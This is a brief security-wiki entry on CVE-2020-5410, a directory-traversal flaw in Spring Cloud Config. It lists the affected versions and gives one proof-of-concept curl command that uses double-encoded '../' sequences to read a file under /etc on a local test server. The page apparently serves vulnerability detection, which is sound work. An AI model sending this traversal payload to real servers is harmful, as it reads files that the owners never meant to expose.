menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right Spring Cloud chevron_right CVE-2020-5410 Spring Cloud Config 目录穿越
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    CVE-2020-5410 Spring Cloud Config 目录穿越

    影响版本:

    • 2.2.0 to 2.2.2
    • 2.1.0 to 2.1.8

    poc:

    curl http://127.0.0.1:8888/..%252F..%252Fetc%252Fdd.txt%23/CESHI

    读取/etc/dd.txt文件

    ceshi ceshi ceshi